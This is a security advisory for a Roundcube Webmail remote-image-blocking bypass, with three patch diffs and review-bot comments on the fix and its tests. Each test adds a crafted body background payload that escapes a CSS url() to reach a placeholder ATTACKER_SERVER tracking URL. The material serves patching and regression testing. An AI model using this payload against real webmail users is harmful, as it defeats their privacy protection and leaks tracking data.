VYPR
Medium severity · 5.3 (NVD) · Advisory · Published Apr 3, 2026 · Updated Apr 7, 2026

CVE-2026-35542

Description

An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. The remote image blocking feature can be bypassed via a crafted background attribute of a BODY element in an e-mail message. This may lead to information disclosure or access-control bypass.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: roundcube/roundcubemail (Packagist)
Affected versions: >= 1.7-beta, < 1.7-rc5
Patched versions: 1.7-rc5

Patches (3)

fd0e98178db5

Fix remote image blocking bypass via a crafted body background attribute

https://github.com/roundcube/roundcubemail · Aleksander Machniak · Mar 18, 2026 · via ghsa
3 files changed · +13 -0
  • CHANGELOG.md (+1 -0, modified)
    @@ -13,6 +13,7 @@ This file includes only changes we consider noteworthy for users, admins and plu
     - Security: Fix bug where a password could get changed without providing the old password
     - Security: Fix IMAP Injection + CSRF bypass in mail search
     - Security: Fix remote image blocking bypass via various SVG animate attributes
    +- Security: Fix remote image blocking bypass via a crafted body background attribute
     
     ## 1.7-rc4
     
    
  • program/lib/Roundcube/rcube_washtml.php (+5 -0, modified)
    @@ -416,6 +416,11 @@ private function wash_uri($uri, $blocked_source = false, $is_image = true)
                     return 'data:image/' . $type . ',' . base64_encode($svg);
                 }
     
    +            // At this point we allow only valid base64 images
    +            if (stripos($type, 'base64') === false || preg_match('|[^0-9a-z\s/+]|i', $matches[2])) {
    +                return '';
    +            }
    +
                 return $uri;
             }
     
    
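Review bot: the character class on the added `preg_match` line, `[^0-9a-z\s/+]`, omits `=`, so a legitimate padded base64 image (any payload whose encoded length is not a multiple of 4 ends in `=` or `==`) would hit the `return ''` branch unless padding is stripped before this point, which is not visible in this hunk. Consider `'|[^0-9a-z\s/+=]|i'` and a test with a padded base64 PNG that must survive washing. The direction of the check is right: rejecting `)`, `;`, `(`, `:` and `%` in `$matches[2]` (presumably the part after the comma) is what stops a value from closing the CSS `url(` and appending a second remote `background`. The comment says "valid base64 images", but this only filters the alphabet and neither decodes nor checks length; wording it as "only base64-alphabet characters" would be more accurate.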
  • tests/Framework/WashtmlTest.php (+7 -0, modified)
    @@ -271,6 +271,13 @@ public function test_style_body_attrs()
             $this->assertMatchesRegularExpression('|link="#111"|', $washed, 'Body link attribute');
             $this->assertMatchesRegularExpression('|alink="#222"|', $washed, 'Body alink attribute');
             $this->assertMatchesRegularExpression('|vlink="#333"|', $washed, 'Body vlink attribute');
    +
    +        $html = '<html><body background="data:image/png,x);background:url(//ATTACKER_SERVER/track?uid=test"></body></html>';
    +
    +        $washer = new \rcube_washtml(['html_elements' => ['body']]);
    +        $washed = $washer->wash($html);
    +
    +        $this->assertMatchesRegularExpression('|x-washed="background"|', $washed, 'Body evil background');
         }
     
         /**
    
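Review bot: the new assertion only checks that the attribute was marked as washed (`x-washed="background"`); it does not assert that the injected remote URL is gone from the output, so a regression that keeps the marker but still emits the URL would pass. Add `$this->assertStringNotContainsString('ATTACKER_SERVER', $washed);` after the existing assertion. A positive case with a well-formed base64 `data:image/png;base64,...` value that must be preserved would pin the allow-list from the other side.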
e052328e3dc7

Fix remote image blocking bypass via a crafted body background attribute

https://github.com/roundcube/roundcubemail · Aleksander Machniak · Mar 18, 2026 · via ghsa
3 files changed · +13 -0
  • CHANGELOG.md (+1 -0, modified)
    @@ -6,6 +6,7 @@
     - Security: Fix bug where a password could get changed without providing the old password
     - Security: Fix IMAP Injection + CSRF bypass in mail search
     - Security: Fix remote image blocking bypass via various SVG animate attributes
    +- Security: Fix remote image blocking bypass via a crafted body background attribute
     
     ## Release 1.5.13
     
    
  • program/lib/Roundcube/rcube_washtml.php (+5 -0, modified)
    @@ -424,6 +424,11 @@ private function wash_uri($uri, $blocked_source = false, $is_image = true)
                     return 'data:image/' . $type . ',' . base64_encode($svg);
                 }
     
    +            // At this point we allow only valid base64 images
    +            if (stripos($type, 'base64') === false || preg_match('|[^0-9a-z\s/+]|i', $matches[2])) {
    +                return '';
    +            }
    +
                 return $uri;
             }
         }
    
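Review bot: `=` is missing from the allowed set on the added `preg_match` line, so base64 data with padding (the common case for PNG and JPEG payloads) is rejected with `return ''` unless something before this hunk strips the padding. Use `'|[^0-9a-z\s/+=]|i'` and cover a padded image in the test. The rest of the check does what is needed: any `)`, `;` or `%` in `$matches[2]` now empties the URI instead of reaching the CSS `url(`.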
  • tests/Framework/Washtml.php (+7 -0, modified)
    @@ -247,6 +247,13 @@ function test_style_body_attrs()
             $this->assertRegExp('|link="#111"|', $washed, "Body link attribute");
             $this->assertRegExp('|alink="#222"|', $washed, "Body alink attribute");
             $this->assertRegExp('|vlink="#333"|', $washed, "Body vlink attribute");
    +
    +        $html = '<html><body background="data:image/png,x);background:url(//ATTACKER_SERVER/track?uid=test"></body></html>';
    +
    +        $washer = new \rcube_washtml(['html_elements' => ['body']]);
    +        $washed = $washer->wash($html);
    +
    +        $this->assertRegExp('|x-washed="background"|', $washed, 'Body evil background');
         }
     
         /**
    
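Review bot: the assertion message on the added `assertRegExp` line uses single quotes while the three context lines above use double quotes; match the surrounding style in this branch. The test should also assert that `ATTACKER_SERVER` does not appear in `$washed`, not only that the attribute carries the `x-washed` marker, since the former is the property the fix is meant to guarantee.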
fde14d01adc9

Fix remote image blocking bypass via a crafted body background attribute

https://github.com/roundcube/roundcubemail · Aleksander Machniak · Mar 18, 2026 · via ghsa
3 files changed · +19 -6
  • CHANGELOG.md (+1 -0, modified)
    @@ -7,6 +7,7 @@
     - Security: Fix bug where a password could get changed without providing the old password
     - Security: Fix IMAP Injection + CSRF bypass in mail search
     - Security: Fix remote image blocking bypass via various SVG animate attributes
    +- Security: Fix remote image blocking bypass via a crafted body background attribute
     
     ## Release 1.6.13
     
    
  • program/lib/Roundcube/rcube_washtml.php (+5 -0, modified)
    @@ -427,6 +427,11 @@ private function wash_uri($uri, $blocked_source = false, $is_image = true)
                     return 'data:image/' . $type . ',' . base64_encode($svg);
                 }
     
    +            // At this point we allow only valid base64 images
    +            if (stripos($type, 'base64') === false || preg_match('|[^0-9a-z\s/+]|i', $matches[2])) {
    +                return '';
    +            }
    +
                 return $uri;
             }
         }
    
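Review bot: the allow-list `[^0-9a-z\s/+]` on the added `preg_match` line has no `=`, so padded base64 image data is returned as an empty URI unless padding is removed earlier (not shown in this hunk); `'|[^0-9a-z\s/+=]|i'` would keep valid padded images while still rejecting the `)` and `;` that let a `data:` value break out of `url(`. Worth a regression test with a padded base64 image alongside the crafted one.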
  • tests/Framework/Washtml.php (+13 -6, modified)
    @@ -262,12 +262,19 @@ function test_style_body_attrs()
             $washer = new rcube_washtml(['html_elements' => ['body']]);
             $washed = $washer->wash($html);
     
    -        $this->assertMatchesRegularExpression('|bgcolor="#fff"|', $washed, "Body bgcolor attribute");
    -        $this->assertMatchesRegularExpression('|text="#000"|', $washed, "Body text attribute");
    -        $this->assertMatchesRegularExpression('|background="#test"|', $washed, "Body background attribute");
    -        $this->assertMatchesRegularExpression('|link="#111"|', $washed, "Body link attribute");
    -        $this->assertMatchesRegularExpression('|alink="#222"|', $washed, "Body alink attribute");
    -        $this->assertMatchesRegularExpression('|vlink="#333"|', $washed, "Body vlink attribute");
    +        $this->assertMatchesRegularExpression('|bgcolor="#fff"|', $washed, 'Body bgcolor attribute');
    +        $this->assertMatchesRegularExpression('|text="#000"|', $washed, 'Body text attribute');
    +        $this->assertMatchesRegularExpression('|background="#test"|', $washed, 'Body background attribute');
    +        $this->assertMatchesRegularExpression('|link="#111"|', $washed, 'Body link attribute');
    +        $this->assertMatchesRegularExpression('|alink="#222"|', $washed, 'Body alink attribute');
    +        $this->assertMatchesRegularExpression('|vlink="#333"|', $washed, 'Body vlink attribute');
    +
    +        $html = '<html><body background="data:image/png,x);background:url(//ATTACKER_SERVER/track?uid=test"></body></html>';
    +
    +        $washer = new \rcube_washtml(['html_elements' => ['body']]);
    +        $washed = $washer->wash($html);
    +
    +        $this->assertMatchesRegularExpression('|x-washed="background"|', $washed, 'Body evil background');
         }
     
         /**
    
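Review bot: six of the changed lines only swap double quotes for single quotes in assertion messages; that churn is unrelated to the fix and makes this security backport harder to diff against the other branches, so keep it out or put it in a separate commit. The new `new \rcube_washtml(...)` is also inconsistent with `new rcube_washtml(...)` at the top of the hunk; both resolve the same in a non-namespaced test, so pick one. Finally, assert that `ATTACKER_SERVER` is absent from `$washed` in addition to checking the `x-washed="background"` marker.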
